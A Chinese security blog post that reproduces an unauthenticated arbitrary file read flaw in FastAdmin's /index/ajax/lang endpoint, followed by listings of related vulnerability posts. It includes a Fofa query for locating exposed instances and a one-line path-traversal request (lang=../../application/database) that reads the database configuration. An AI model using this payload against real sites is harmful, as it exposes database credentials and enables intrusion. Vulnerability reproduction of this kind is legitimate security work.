FastAdmin后台开发框架 lang 任意文件读取漏洞复现

安全小木屋

已于 2024-06-24 23:11:22 修改

阅读量387

点赞数 7

分类专栏：漏洞复现文章标签：网络安全

于 2024-06-24 19:55:04 首次发布

本文链接：https://blog.csdn.net/luckly_move/article/details/139936571

版权

漏洞复现专栏收录该内容

1 篇文章 0 订阅

订阅专栏

FastAdmin后台开发框架 lang 任意文件读取漏洞复现

产品介绍

FastAdmin是一款基于PHP+Bootstrap的开源后台框架，专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建，拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率，降低开发成本，同时确保后台系统的稳定性和安全性。

漏洞描述

FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

Fofa

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC：

GET /index/ajax/lang?lang=../../application/database HTTP/1.1

读取数据库配置信息
在这里插入图片描述

更多POC获取

关注公众号：“安全小木屋”，回复POC即可获取POC，最新漏洞POC会更新至百度网盘链接。
在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

安全小木屋

关注关注

7
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【漏洞复现】泛微OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞

凝聚力安全团队

06-19

1996

泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞，攻击者可通过该漏洞上传任意文件从而控制整个服务器。

fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)

WuYSec的博客

06-18

1090

fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架，旨在帮助开发者快速构建高效、灵活的后台管理系统。fastAdmin存在任意文件读取漏洞，可直接读取数据库配置文件。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞预警】FastAdmin框架任意文件读取漏洞

晚风不及你

06-11

2520

FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞，攻击者利用此漏洞可以获取系统敏感信息。

【漏洞复现】FastAdmin——lang——任意文件读取漏洞

LongL_GuYu的博客

06-27

2156

FastAdmin是一个免费开源的后台管理框架，其lang存在任意文件读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息。

(新接口)用友NC某接口存在任意文件读取漏洞-0day

weixin_43167326的博客

02-22

1630

用友NC是一款企业级ERP（企业资源计划）软件，它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块，适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性，可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发，具有跨平台、集成度高、业务流程自动化、信息共享等特点，能够有效提高企业的管理效率和降低成本，是众多企业的首选管理软件。。

用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)

qq_39894062的博客

04-20

916

任意文件读取下载漏洞

weixin_48712514的博客

05-19

1632

1. 任意文件读取一些网站的需求，可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过，就可以查看或下载任意文件。这些文件可以是源代码文件，配置文件，敏感文件等等。 1：敏感信息泄露 2：目录穿越，目录穿透，目录遍历任意文件读取与下载漏洞原理 1：从权限的角度来讲，读取与下载都是属于读权限漏洞成因不管是任意文件读取还是任意文件下载，触发漏洞的条件都是相同的 1：存在读取文件的函数（web应用开放了读取功能） 2：读取文件的路径客户端可控（完全控制） 3：没有对文件路

安美数字酒店宽带运营系统 weather.php 任意文件读取漏洞复现

最新发布

0xSec

08-12

935

安美数字酒店宽带运营系统 weather.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

做自己喜欢的事，并将其发挥到极致！

09-12

836

泛微e-office OfficeServer2.php 存在任意文件读取漏洞，攻击者可通过构造特定Payload获取敏感数据信息。

【漏洞复现】泛微OA E-Cology action.jsp 任意文件上传漏洞

凝聚力安全团队

06-18

1143

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。

学习总结之任意文件读取漏洞（网站敏感数据泄露）

weixin_63694057的博客

06-17

1850

以下内容是我在实践过程中找到的一个任意文件读取漏洞，通过DirBuster发现该域名下存在.zip文件，通过在域名路径下加上该文件即可将这个压缩包下载到我的本地，然后解压发现是该网站的源码，这个漏洞对该企业网站来说影响是很大的，我也提交了该漏洞。原理：攻击者使用各种攻击方式扫描目标网站，寻找未授权访问的漏洞，然后攻击者利用这些漏洞发送特殊请求，获取到网站上存在的敏感信息或者文件；还有phpinfo文件，能够获取到服务器真实IP，一些配置信息如中间件，系统版本，数据库版本等，以及获取到网站根目录。

fastadmin前台分片漏洞

Fiverya的博客

12-05

3117

参考链接：fastadmin安装fastadmin安装前台分片漏洞复现：https://blog.csdn.net/weixin_43288600/article/details/121192252https://blog.csdn.net/u013921288/article/details/117670844https://xz.aliyun.com/t/9395FastAdmin最新RCE漏洞复现https://www.secpulse.com/archives/157307.html搭建好环境后，查

Fastadmin后台插件-在线命令管理-getshell

dzqxwzoe的博客

02-20

2641

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

FastAdmin前台分片传输上传文件getshell

若把此心以学道，即身成佛有何难

10-14

1189

道虽远，行则易至；儒虽难，坚为易成

【网络安全】记一次挖洞的日常

kali_Ma的博客

09-07

2277

前言：上个月月初开始，在那些项目结束之后进入了挖洞时期，每天的日常工作就是挖洞，除非有临时的项目才会停下，最近在整理报告，发现了这个站，还是挺有意思的。信息收集从fofa上找到了这个站点，叫做fastadmin，是基于Thinkphp5和bootstrap开发的后台框架，常规思路找一下后台，根据经验，没意外的话php的站点基本都是根路径后加个admin就可以找到了 getshell 常规手段弱口令先打一波，不行再试试SQL注入弱口令admin/123456成功进入后台因为结合了tp5框架，想到可能

AJAX的使用及常见问题的处理（AJAX入门到熟练使用）

杨明金的博客

05-29

755

文章目录一、基础知识1.1AJAX简介1.2 AJAX的特点1.2.1 AJAX 的优点1.2.2 AJAX 的缺点1.3 XML简介1.4 HTTP简介1.4.1 请求报文1.4.2 响应报文二、express框架2.1 AJAX-express框架介绍与基本使用2.2 使用nodemon工具三、原生AJAX请求的基本操作3.1 get 请求方式的使用3.2 post 请求方式的使用3.3 服务器响应 JSON 数据3.4 IE浏览器缓存问题解决3.5 请求超时与网络异常处理3.6 AJAX请求取消操作3

通达OA低版本文件上传+apache解析漏洞getshell

谢公子的博客

05-12

1983

目录漏洞文件漏洞利用条件漏洞复现漏洞文件 /general/vmeet/privateUpload.php 漏洞利用条件通达OA低版本 apache存在解析漏洞漏洞复现测试环境：通达OA 2008，apache存在解析漏洞首先访问是否存在该文件存在的话，将下面代码保存后缀为1.html文件，然后将木马命名为 aaa.php.1，与1.html在同一个目录下 <form id="frmUpload" enctype="multipart/for..